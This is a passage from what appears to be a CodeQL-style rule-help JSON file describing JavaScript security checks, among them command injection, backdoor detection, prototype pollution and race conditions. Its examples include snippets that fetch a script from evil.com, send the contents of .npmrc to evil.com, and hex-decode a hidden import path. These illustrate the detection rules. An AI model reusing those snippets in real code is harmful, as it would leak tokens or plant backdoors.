line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n    nodeOpts = args[1];\n    args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Forwarding command-line arguments to a child process\n              executed within a shell may indirectly introduce\n              command-line injection vulnerabilities.","id":"js/indirect-command-line-injection","kind":"path-problem","name":"Indirect uncontrolled command line","precision":"medium","problem.severity":"warning","security-severity":"6.3"}},{"id":"js/http-to-file-access","name":"js/http-to-file-access","shortDescription":{"text":"Network data written to file"},"fullDescription":{"text":"Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n  res.on(\"data\", d => {\n    fs.writeFileSync(\"/tmp/script\", d)\n  })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n","markdown":"# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n  res.on(\"data\", d => {\n    fs.writeFileSync(\"/tmp/script\", d)\n  })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n"},"properties":{"tags":["security","external/cwe/cwe-912","external/cwe/cwe-434"],"description":"Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.","id":"js/http-to-file-access","kind":"path-problem","name":"Network data written to file","precision":"medium","problem.severity":"warning","security-severity":"6.3"}},{"id":"js/hardcoded-data-interpreted-as-code","name":"js/hardcoded-data-interpreted-as-code","shortDescription":{"text":"Hard-coded data interpreted as code"},"fullDescription":{"text":"Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n  return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n","markdown":"# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n  return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n"},"properties":{"tags":["security","external/cwe/cwe-506"],"description":"Transforming hard-coded data (such as hexadecimal constants) into code\n              to be executed is a technique often associated with backdoors and should\n              be avoided.","id":"js/hardcoded-data-interpreted-as-code","kind":"path-problem","name":"Hard-coded data interpreted as code","precision":"medium","problem.severity":"error","security-severity":"9.1"}},{"id":"js/insecure-temporary-file","name":"js/insecure-temporary-file","shortDescription":{"text":"Insecure temporary file"},"fullDescription":{"text":"Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n","markdown":"# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n"},"properties":{"tags":["external/cwe/cwe-377","external/cwe/cwe-378","security"],"description":"Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.","id":"js/insecure-temporary-file","kind":"path-problem","name":"Insecure temporary file","precision":"medium","problem.severity":"warning","security-severity":"7.0"}},{"id":"js/unsafe-code-construction","name":"js/unsafe-code-construction","shortDescription":{"text":"Unsafe code constructed from library input"},"fullDescription":{"text":"Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n  return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n    return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n  return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n  return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n  return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n    return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n  return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n  return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using externally controlled strings to construct code may allow a malicious\n              user to execute arbitrary code.","id":"js/unsafe-code-construction","kind":"path-problem","name":"Unsafe code constructed from library input","precision":"medium","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/file-access-to-http","name":"js/file-access-to-http","shortDescription":{"text":"File data in outbound network request"},"fullDescription":{"text":"Directly sending file data in an outbound network request can indicate unauthorized information disclosure."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n    https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n  hostname: \"evil.com\",\n  path: \"/upload\",\n  method: \"GET\",\n  headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n","markdown":"# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n    https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n  hostname: \"evil.com\",\n  path: \"/upload\",\n  method: \"GET\",\n  headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n"},"properties":{"tags":["security","external/cwe/cwe-200"],"description":"Directly sending file data in an outbound network request can indicate unauthorized information disclosure.","id":"js/file-access-to-http","kind":"path-problem","name":"File data in outbound network request","precision":"medium","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/file-system-race","name":"js/file-system-race","shortDescription":{"text":"Potential file system race condition"},"fullDescription":{"text":"Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n  fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n  const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n  fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n  // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n","markdown":"# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n  fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n  const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n  fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n  // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n"},"properties":{"tags":["security","external/cwe/cwe-367"],"description":"Separately checking the state of a file before operating\n              on it may allow an attacker to modify the file between\n              the two operations.","id":"js/file-system-race","kind":"problem","name":"Potential file system race condition","precision":"medium","problem.severity":"warning","security-severity":"7.7"}},{"id":"js/empty-password-in-configuration-file","name":"js/empty-password-in-configuration-file","shortDescription":{"text":"Empty password in configuration file"},"fullDescription":{"text":"Failing to set a password reduces the security of your code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n","markdown":"# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n"},"properties":{"tags":["security","external/cwe/cwe-258","external/cwe/cwe-862"],"description":"Failing to set a password reduces the security of your code.","id":"js/empty-password-in-configuration-file","kind":"problem","name":"Empty password in configuration file","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/remote-property-injection","name":"js/remote-property-injection","shortDescription":{"text":"Remote property injection"},"fullDescription":{"text":"Allowing writes to arbitrary properties of an object may lead to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-250","external/cwe/cwe-400"],"description":"Allowing writes to arbitrary properties of an object may lead to\n              denial-of-service attacks.","id":"js/remote-property-injection","kind":"path-problem","name":"Remote property injection","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/client-side-request-forgery","name":"js/client-side-request-forgery","shortDescription":{"text":"Client-side request forgery"},"fullDescription":{"text":"Making a client-to-server request with user-controlled data in the URL allows a request forgery attack against the client."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + query.get('message_id');\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = 